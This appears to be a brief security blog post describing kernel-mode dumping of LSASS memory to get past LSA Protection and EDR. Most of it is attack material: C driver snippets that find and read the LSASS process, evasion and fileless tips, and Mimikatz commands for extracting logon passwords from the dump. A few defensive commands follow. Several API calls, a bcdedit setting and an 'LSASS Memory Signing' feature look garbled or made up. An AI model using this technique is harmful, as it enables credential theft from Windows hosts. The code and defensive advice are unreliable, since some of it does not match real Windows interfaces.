Listen to this Post
LSASS (Local Security Authority Subsystem Service) is a prime target for attackers due to its storage of sensitive credentials. Traditional user-mode dumping methods are often detected by security solutions, especially when LSA Protection is enabled. This article explores a kernel-mode approach to bypass these protections.
Kernel-Mode LSASS Dumping Steps
1. Create a System Thread:
NTSTATUS status = PsCreateSystemThread(&hThread, THREAD_ALL_ACCESS, NULL, NULL, NULL, DumpLsassThread, NULL);
2. Locate LSASS Process:
PEPROCESS GetLsassProcess() {
PEPROCESS Process = NULL;
for (ULONG i = 0; i < PsGetNumberOfProcesses(); i++) {
Process = PsGetNextProcess(Process);
if (strstr(PsGetProcessImageFileName(Process), "lsass.exe")) {
return Process;
}
}
return NULL;
}
3. Attach to LSASS:
KeStackAttachProcess(TargetProcess, &ApcState);
4. Dump Memory Pages:
ZwQueryVirtualMemory(ProcessHandle, BaseAddress, MemoryBasicInformation, &MBI, sizeof(MBI), NULL); ZwWriteFile(FileHandle, NULL, NULL, NULL, &IoStatus, Buffer, Size, NULL, NULL);
You Should Know:
- LSA Protection Bypass: Kernel-mode techniques ignore `RunAsPPL` (Protected Process Light) since they operate at a higher privilege level.
- Detection Evasion: No user-mode API calls (e.g.,
MiniDumpWriteDump) are used, reducing AV/EDR visibility. - Fileless Alternative: Use `ZwAllocateVirtualMemory` + `ZwMapViewOfSection` to avoid writing to disk.
Defensive Measures
- Monitor Kernel Drivers:
Get-WmiObject Win32_SystemDriver | Where-Object { $_.State -eq "Running" } | Select-Object Name, Path - Enable Kernel-Mode Audit:
auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
- Restrict Driver Loading:
bcdedit /set {current} driverloadpolicy high
What Undercode Say
Kernel-mode exploitation is a double-edged sword: powerful for attackers but detectable with proper telemetry. Defenders must prioritize:
– Hypervisor-Protected Code Integrity (HVCI) to block unsigned drivers.
– Kernel Callback Hooks (e.g., ObRegisterCallbacks) to detect process manipulation.
– LSASS Memory Signing (experimental) to prevent unauthorized reads.
Expected Output:
A `C:\dump.dmp` file containing LSASS memory, usable with Mimikatz or Pypykatz:
mimikatz sekurlsa::minidump C:\dump.dmp mimikatz sekurlsa::logonPasswords
Prediction
Kernel-mode attacks will evolve to exploit Windows Subsystem for Linux (WSL) and Hyper-V interfaces, requiring cross-layer defense strategies.
For training, see: Evasion Lab (CETP) or contact [email protected].
IT/Security Reporter URL:
Reported By: Saad Ahla – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
